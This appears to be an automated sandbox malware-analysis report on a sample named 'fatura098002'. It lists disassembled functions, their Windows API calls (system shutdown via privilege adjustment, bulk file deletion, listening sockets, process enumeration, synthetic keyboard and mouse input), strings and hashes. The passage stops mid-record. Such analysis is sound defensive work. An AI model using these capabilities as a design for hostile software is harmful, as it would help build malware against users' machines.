Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p#}
API String ID: 973565025-1379082668
Opcode ID: 3272b025381dffac76108bdbba916085b79450417167d952b4b17132b82e708e
Instruction ID: f1e2cf150c3f1dbbbdace53b19adc09c16bddf6dd5f01135b7706758e2bea850
Opcode Fuzzy Hash: 3272b025381dffac76108bdbba916085b79450417167d952b4b17132b82e708e
Instruction Fuzzy Hash: C7518A71105240EFDB04DF24D86AFAA77E4BB89710F40066EF952572E2CB78A945CB62

Function 0076E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 007616C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0076170D
Part of subcall function 007616C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0076173A
Part of subcall function 007616C3: GetLastError.KERNEL32 ref: 0076174A

ExitWindowsEx.USER32(?,00000000), ref: 0076E932

Strings

SeShutdownPrivilege, xrefs: 0076E902
@, xrefs: 0076E925
, xrefs: 0076E920
, xrefs: 0076E95C

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 079c04440e6a7c95b8cd2df4be49e1a9f9625f055606533f0c1287942623d0b4
Instruction ID: 9f25e2d080851bc81d6a98e3f29476e829f5c27ef61817b2797d0698275ee110
Opcode Fuzzy Hash: 079c04440e6a7c95b8cd2df4be49e1a9f9625f055606533f0c1287942623d0b4
Instruction Fuzzy Hash: D301D676610311ABFF5466B49C8AFBB736CAF14750F194426FC03F21D1E5AD6C4085B5

Function 00781204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 00781276
WSAGetLastError.WS2_32 ref: 00781283
bind.WS2_32(00000000,?,00000010), ref: 007812BA
WSAGetLastError.WS2_32 ref: 007812C5
closesocket.WS2_32(00000000), ref: 007812F4
listen.WS2_32(00000000,00000005), ref: 00781303
WSAGetLastError.WS2_32 ref: 0078130D
closesocket.WS2_32(00000000), ref: 0078133C

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: a1b6dbd16814fdadfcb79e26d9a4144e539fe6dc6020eb972a7aba8f5f9f101b
Instruction ID: 37da988613070407c47d19f69bcceabc482f2d9b5d1b586e6777365a7773e2db
Opcode Fuzzy Hash: a1b6dbd16814fdadfcb79e26d9a4144e539fe6dc6020eb972a7aba8f5f9f101b
Instruction Fuzzy Hash: 8D417231600110DFD710EF64C488B69BBE5BF46318F588199D8569F2D6C779ED82CBE1

Function 0073B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0073B9D4
_free.LIBCMT ref: 0073B9F8
_free.LIBCMT ref: 0073BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,007A3700), ref: 0073BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,007D121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0073BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,007D1270,000000FF,?,0000003F,00000000,?), ref: 0073BC36
_free.LIBCMT ref: 0073BD4B

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: b970fa2b46ca233e9f7d72c443c5598f25cb404a7653567a89eeeab3aa256cff
Instruction ID: 726a2fd18a2aa0d3e046685bebde227021747fb7ee07cbfb42400e08e1c29dd8
Opcode Fuzzy Hash: b970fa2b46ca233e9f7d72c443c5598f25cb404a7653567a89eeeab3aa256cff
Instruction Fuzzy Hash: BDC13971A04214EFEB20DF789C45BAABBB9EF45310F14819AE694D7253EB389E41C750

Function 0076D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00703AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00703A97,?,?,00702E7F,?,?,?,00000000), ref: 00703AC2

Part of subcall function 0076E199: GetFileAttributesW.KERNEL32(?,0076CF95), ref: 0076E19A

FindFirstFileW.KERNEL32(?,?), ref: 0076D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0076D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0076D481
FindClose.KERNEL32(00000000), ref: 0076D498
FindClose.KERNEL32(00000000), ref: 0076D4A1

Strings

\*.*, xrefs: 0076D3F2

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 609d4f743626f9ea5809c8b3405521868b8fb4cfdc265267d211f53321ec2d21
Instruction ID: 125735dd14e6ee0fb4ea9f7b9513177fa6dc00129240e4896663e87cee17688a
Opcode Fuzzy Hash: 609d4f743626f9ea5809c8b3405521868b8fb4cfdc265267d211f53321ec2d21
Instruction Fuzzy Hash: 2D319071418385DBC715EF60C8958AFBBE8BE91300F448A1DF8D2521D1EB38AE09CB63

Function 0073E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0073E645

Strings

1#INF, xrefs: 0073F852
1#IND, xrefs: 0073F83D
1#SNAN, xrefs: 0073F844
1#QNAN, xrefs: 0073F84B

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 7f91e7f47cd6f49e30a843bc7ebaa561d19931dbd600a95bbb01ccb3d688f8ad
Instruction ID: 9d9daa902bea79abb36f8b91dfd2ae5f40e7c86f02dcce2652c797524472327a
Opcode Fuzzy Hash: 7f91e7f47cd6f49e30a843bc7ebaa561d19931dbd600a95bbb01ccb3d688f8ad
Instruction Fuzzy Hash: D1C23D72E046298FEB25CF28DD447EAB7B5EB44345F1441EAD44DE7282E778AE818F40

Function 0077648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007764DC
CoInitialize.OLE32(00000000), ref: 00776639
CoCreateInstance.COMBASE(0079FCF8,00000000,00000001,0079FB68,?), ref: 00776650
CoUninitialize.COMBASE ref: 007768D4

Strings

.lnk, xrefs: 007764BA, 00776524, 007765E0

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 3bb199cd64413ef8ff8981cb1653f1829fbe972cbc04af4d800ff987fc226a30
Instruction ID: ebd4d1e4603bf9f69932ab79622b584cd6926a378e9246840f51fa2e827e1a02
Opcode Fuzzy Hash: 3bb199cd64413ef8ff8981cb1653f1829fbe972cbc04af4d800ff987fc226a30
Instruction Fuzzy Hash: 6BD14971508601DFC704EF24C885A6BB7E8FF94744F048A6DF5998B291DB74ED05CBA2

Function 007822DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 007822E8

Part of subcall function 0077E4EC: GetWindowRect.USER32(?,?), ref: 0077E504

GetDesktopWindow.USER32 ref: 00782312
GetWindowRect.USER32(00000000), ref: 00782319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00782355
GetCursorPos.USER32(?), ref: 00782381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007823DF

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: cb8bf2dd7f2576f07a523a37dd9b2747b0ee58ec5f770af04c988ce7fc344626
Instruction ID: 3f977c73c3222014573ceeb824631c9b8b3aedc9676fd8ce97cb19739a2e294c
Opcode Fuzzy Hash: cb8bf2dd7f2576f07a523a37dd9b2747b0ee58ec5f770af04c988ce7fc344626
Instruction Fuzzy Hash: 5231E372544315AFCB21EF54C849F5BB7E9FF84310F00491AF98597182DB38E90ACBA6

Function 00779B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00779B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00779C8B

Part of subcall function 00773874: GetInputState.USER32 ref: 007738CB
Part of subcall function 00773874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00773966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00779BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00779C75

Strings

*.*, xrefs: 00779B5D

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 079a0e9ee0f223bb9a3a0297356191433e6095ec944bcd81b029fa50e219652d
Instruction ID: 3efcd79092053ab820623eea2da6d5a78028fcf5e1166e10cfcd32ef3e277b10
Opcode Fuzzy Hash: 079a0e9ee0f223bb9a3a0297356191433e6095ec944bcd81b029fa50e219652d
Instruction Fuzzy Hash: B84161B1901209EFDF15DF74C989AEEBBF8EF05350F248156E509A2191DB389E84CF60

Function 0071997D Relevance: 7.9, APIs: 5, Instructions: 375nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2

NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00719A4E
GetSysColor.USER32(0000000F), ref: 00719B23
SetBkColor.GDI32(?,00000000), ref: 00719B36

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Color$DialogLongNtdllProc_Window
String ID:
API String ID: 1958858920-0
Opcode ID: aa5d306bc4fb6b25d84285639c2d718692fc1179688aaf66f75672815ab4662d
Instruction ID: fa9fb979b4b9a8abd83038b5dbaaf2dcdb27c371972ee2d383b591a3d6ce0d24
Opcode Fuzzy Hash: aa5d306bc4fb6b25d84285639c2d718692fc1179688aaf66f75672815ab4662d
Instruction Fuzzy Hash: 98A12C70208444FEE7299A3CAC7DDFB26ADDF46341B158109FA02C66D1CA6DDD8BC276

Function 00781806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0078304E: inet_addr.WS2_32(?), ref: 0078307A
Part of subcall function 0078304E: _wcslen.LIBCMT ref: 0078309B

socket.WS2_32(00000002,00000002,00000011), ref: 0078185D
WSAGetLastError.WS2_32 ref: 00781884
bind.WS2_32(00000000,?,00000010), ref: 007818DB
WSAGetLastError.WS2_32 ref: 007818E6
closesocket.WS2_32(00000000), ref: 00781915

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 0c3a4f494946a13b575a25e5a388a110588d9278ccf54fc819a17341248e5d72
Instruction ID: 6b340168424aa650cb88e27bc7bee981ad4dfabc3ca856a51c8f7e1cbda0bf49
Opcode Fuzzy Hash: 0c3a4f494946a13b575a25e5a388a110588d9278ccf54fc819a17341248e5d72
Instruction Fuzzy Hash: AB51B471A40200DFDB10AF24C88AF6A77E5AB45718F488198F9059F3D3C779AD82CBE1

Function 00708060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

ERCP, xrefs: 0070813C
VUUU, xrefs: 007083FA
VUUU, xrefs: 00745DF0
VUUU, xrefs: 0070843C
VUUU, xrefs: 007083E8

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 6be77e76cd9be841cb72e7f69f76ca1cdaae1610947962009d2fb982f0aa63b2
Instruction ID: 100ad4d40d3c9ab1b6cf53aba296b0d8d4313d968d405f65fac21772c694f171
Opcode Fuzzy Hash: 6be77e76cd9be841cb72e7f69f76ca1cdaae1610947962009d2fb982f0aa63b2
Instruction Fuzzy Hash: 0BA29270E0061ACBDF64CF58C8807ADB7B1BF55314F2482AAE855A7285EB789D81CF52

Function 00768298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 007682AA

Strings

|, xrefs: 007682DA
tb|, xrefs: 007684F4
(, xrefs: 007682F0

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: lstrlen
String ID: ($tb|$|
API String ID: 1659193697-2513361831
Opcode ID: 0b7f8cb3fc1c36ace19f338c20eb2e5a984dd2ba050497dd9e0e0aeeeae841ba
Instruction ID: d839e61fd71fa095c30abd39204c39127c505eeced341db5944735f6a982f892
Opcode Fuzzy Hash: 0b7f8cb3fc1c36ace19f338c20eb2e5a984dd2ba050497dd9e0e0aeeeae841ba
Instruction Fuzzy Hash: 06323574A00605DFCB68CF59C080A6AB7F0FF48710B15C56EE89ADB3A1EB74E981CB45

Function 0078A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0078A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0078A6BA

Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD

Process32NextW.KERNEL32(00000000,?), ref: 0078A79C
CloseHandle.KERNEL32(00000000), ref: 0078A7AB

Part of subcall function 0071CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00743303,?), ref: 0071CE8A

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 441a11a6ebe9f84164020b1f0e96e368a8b86eb3be4019b1828a856e859d1f9e
Instruction ID: 4807bf1d1ceb7b55dbac27bd87dd44c8d010b0e13f8b405c53724b2201fb8081
Opcode Fuzzy Hash: 441a11a6ebe9f84164020b1f0e96e368a8b86eb3be4019b1828a856e859d1f9e
Instruction Fuzzy Hash: 495130B1508301EFD710EF24C88AA5BBBE8FF89754F408A1DF58597291EB74E944CB92

Function 0076AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0076AAAC
SetKeyboardState.USER32(00000080), ref: 0076AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0076AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0076AB88

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 1eb86e18d7c6f1987e6ed55a673383b7b7c89f8a0e597056ba97414b236ac0da
Instruction ID: 42fe0a5fa1f3c6f8a3b8ac98880bc3ab1f366b9e225c8904d3acda11500f318b
